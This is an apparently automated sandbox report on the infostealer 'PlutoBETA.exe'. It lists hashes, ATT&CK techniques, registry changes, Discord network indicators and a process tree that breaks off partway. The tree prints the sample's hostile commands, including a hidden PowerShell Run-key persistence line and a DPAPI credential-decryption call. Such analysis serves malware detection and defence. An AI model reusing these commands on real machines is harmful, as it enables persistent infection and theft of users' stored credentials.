dce8aa2451ab2695e3bc88e6a7aa6b4bc0caea02d9b20995a2a2ffba17094139

Resubmissions

17-05-2024 13:12

240517-qft5msac5z 10

17-05-2024 13:09

240517-qdv9xsac4s 10

Analysis

max time kernel
1757s
max time network
1758s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2024 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PlutoBETA.2/PlutoBETA.exe
Size

37.6MB
MD5

529f707d764d2da27d2b8f982e5c3c37
SHA1

e4ab7395a54777c310259b975e6ccbd1cc934d37
SHA256

90473bef6e0137f9d543260dec681ee7ce0f0e833f4084b4d427c1fea3f49045
SHA512

67e551b165f02fabd406afaa5a88cf75aa69cec689b544d41d093656783828236813102cbab8d8868457eec070039d381fe544c9215d07f66730fe4e97ceef63
SSDEEP

393216:JQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgh96l+ZArYsFRl7du:J3on1HvSzxAMNhFZArYsSPvp7OZuF

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5096	powershell.exe
4288	powershell.exe
4312	powershell.exe
1500	powershell.exe
2076	powershell.exe
3816	powershell.exe
3656	powershell.exe
232	powershell.exe
3744	powershell.exe
3668	powershell.exe
5048	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PlutoBETA.execscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	PlutoBETA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

Processes:

PlutoBETA.exe

pid process

2888 PlutoBETA.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2888	PlutoBETA.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\obMgpyfHzAZRjxk.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PlutoBETA.2\\PlutoBETA.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

23 discord.com
26 discord.com
55 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 api.ipify.org
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

Processes:

cmd.execmd.exe

pid process

3504 cmd.exe
744 cmd.exe

flow	ioc
23	discord.com
26	discord.com
55	discord.com

flow	ioc
22	api.ipify.org

pid	process
3504	cmd.exe
744	cmd.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1344 schtasks.exe
Detects videocard installed 1 TTPs 10 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

2804 WMIC.exe
744 WMIC.exe
3504 WMIC.exe
1436 WMIC.exe
740 WMIC.exe
3760 WMIC.exe
2688 WMIC.exe
1420 WMIC.exe
1628 WMIC.exe
4392 WMIC.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3092 tasklist.exe
1052 tasklist.exe

pid	process
1344	schtasks.exe

pid	process
2804	WMIC.exe
744	WMIC.exe
3504	WMIC.exe
1436	WMIC.exe
740	WMIC.exe
3760	WMIC.exe
2688	WMIC.exe
1420	WMIC.exe
1628	WMIC.exe
4392	WMIC.exe

pid	process
3092	tasklist.exe
1052	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exereg.exepowershell.execscript.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	cscript.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

4584 reg.exe
2712 reg.exe
2044 reg.exe
2388 reg.exe
1776 reg.exe
3976 reg.exe
3288 reg.exe
4524 reg.exe

pid	process
4584	reg.exe
2712	reg.exe
2044	reg.exe
2388	reg.exe
1776	reg.exe
3976	reg.exe
3288	reg.exe
4524	reg.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePlutoBETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5048	powershell.exe
5048	powershell.exe
1952	powershell.exe
1952	powershell.exe
2304	powershell.exe
2304	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
4288	powershell.exe
4288	powershell.exe
4288	powershell.exe
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
2196	powershell.exe
2196	powershell.exe
2196	powershell.exe
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
2888	PlutoBETA.exe
2888	PlutoBETA.exe
2888	PlutoBETA.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
4304	powershell.exe
4304	powershell.exe
4304	powershell.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
1500	powershell.exe
1500	powershell.exe
2076	powershell.exe
2076	powershell.exe
3816	powershell.exe
3816	powershell.exe
3656	powershell.exe
3656	powershell.exe
232	powershell.exe
232	powershell.exe
3744	powershell.exe
3744	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	3092	tasklist.exe
Token: SeDebugPrivilege	1052	tasklist.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe
Token: 36	1800	WMIC.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeIncreaseQuotaPrivilege	3844	WMIC.exe
Token: SeSecurityPrivilege	3844	WMIC.exe
Token: SeTakeOwnershipPrivilege	3844	WMIC.exe
Token: SeLoadDriverPrivilege	3844	WMIC.exe
Token: SeSystemProfilePrivilege	3844	WMIC.exe
Token: SeSystemtimePrivilege	3844	WMIC.exe
Token: SeProfSingleProcessPrivilege	3844	WMIC.exe
Token: SeIncBasePriorityPrivilege	3844	WMIC.exe
Token: SeCreatePagefilePrivilege	3844	WMIC.exe
Token: SeBackupPrivilege	3844	WMIC.exe
Token: SeRestorePrivilege	3844	WMIC.exe
Token: SeShutdownPrivilege	3844	WMIC.exe
Token: SeDebugPrivilege	3844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3844	WMIC.exe
Token: SeRemoteShutdownPrivilege	3844	WMIC.exe
Token: SeUndockPrivilege	3844	WMIC.exe
Token: SeManageVolumePrivilege	3844	WMIC.exe
Token: 33	3844	WMIC.exe
Token: 34	3844	WMIC.exe
Token: 35	3844	WMIC.exe
Token: 36	3844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

PlutoBETA.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2888 wrote to memory of 2764	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 2764	2888	PlutoBETA.exe	cmd.exe
PID 2764 wrote to memory of 696	2764	cmd.exe	cmd.exe
PID 2764 wrote to memory of 696	2764	cmd.exe	cmd.exe
PID 2764 wrote to memory of 5048	2764	cmd.exe	powershell.exe
PID 2764 wrote to memory of 5048	2764	cmd.exe	powershell.exe
PID 5048 wrote to memory of 3984	5048	powershell.exe	csc.exe
PID 5048 wrote to memory of 3984	5048	powershell.exe	csc.exe
PID 3984 wrote to memory of 4292	3984	csc.exe	cvtres.exe
PID 3984 wrote to memory of 4292	3984	csc.exe	cvtres.exe
PID 2888 wrote to memory of 4056	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 4056	2888	PlutoBETA.exe	cmd.exe
PID 4056 wrote to memory of 4732	4056	cmd.exe	curl.exe
PID 4056 wrote to memory of 4732	4056	cmd.exe	curl.exe
PID 2888 wrote to memory of 1988	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 1988	2888	PlutoBETA.exe	cmd.exe
PID 1988 wrote to memory of 3092	1988	cmd.exe	tasklist.exe
PID 1988 wrote to memory of 3092	1988	cmd.exe	tasklist.exe
PID 2888 wrote to memory of 392	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 392	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3504	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3504	2888	PlutoBETA.exe	cmd.exe
PID 392 wrote to memory of 1052	392	cmd.exe	tasklist.exe
PID 392 wrote to memory of 1052	392	cmd.exe	tasklist.exe
PID 3504 wrote to memory of 1952	3504	cmd.exe	powershell.exe
PID 3504 wrote to memory of 1952	3504	cmd.exe	powershell.exe
PID 2888 wrote to memory of 744	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 744	2888	PlutoBETA.exe	cmd.exe
PID 744 wrote to memory of 2304	744	cmd.exe	powershell.exe
PID 744 wrote to memory of 2304	744	cmd.exe	powershell.exe
PID 2888 wrote to memory of 2676	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 2676	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3608	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3608	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3912	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3912	2888	PlutoBETA.exe	cmd.exe
PID 3608 wrote to memory of 4876	3608	cmd.exe	reg.exe
PID 3608 wrote to memory of 4876	3608	cmd.exe	reg.exe
PID 2888 wrote to memory of 2300	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 2300	2888	PlutoBETA.exe	cmd.exe
PID 2676 wrote to memory of 1800	2676	cmd.exe	WMIC.exe
PID 2676 wrote to memory of 1800	2676	cmd.exe	WMIC.exe
PID 3912 wrote to memory of 1344	3912	cmd.exe	schtasks.exe
PID 3912 wrote to memory of 1344	3912	cmd.exe	schtasks.exe
PID 2888 wrote to memory of 3780	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 3780	2888	PlutoBETA.exe	cmd.exe
PID 2300 wrote to memory of 5096	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 5096	2300	cmd.exe	powershell.exe
PID 3780 wrote to memory of 3844	3780	cmd.exe	WMIC.exe
PID 3780 wrote to memory of 3844	3780	cmd.exe	WMIC.exe
PID 2888 wrote to memory of 4528	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 4528	2888	PlutoBETA.exe	cmd.exe
PID 4528 wrote to memory of 3956	4528	cmd.exe	cscript.exe
PID 4528 wrote to memory of 3956	4528	cmd.exe	cscript.exe
PID 2888 wrote to memory of 1720	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 1720	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 4348	2888	PlutoBETA.exe	cmd.exe
PID 2888 wrote to memory of 4348	2888	PlutoBETA.exe	cmd.exe
PID 1720 wrote to memory of 4636	1720	cmd.exe	WMIC.exe
PID 1720 wrote to memory of 4636	1720	cmd.exe	WMIC.exe
PID 4348 wrote to memory of 3924	4348	cmd.exe	WMIC.exe
PID 4348 wrote to memory of 3924	4348	cmd.exe	WMIC.exe
PID 4348 wrote to memory of 4544	4348	cmd.exe	WMIC.exe
PID 4348 wrote to memory of 4544	4348	cmd.exe	WMIC.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe
"C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
2⤵
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
3⤵
PID:696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l2u11jyy\l2u11jyy.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5757.tmp" "c:\Users\Admin\AppData\Local\Temp\l2u11jyy\CSC5AB8D0182D02412B90D6385E8EBDC54C.TMP"
5⤵
PID:4292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\cmd.exe
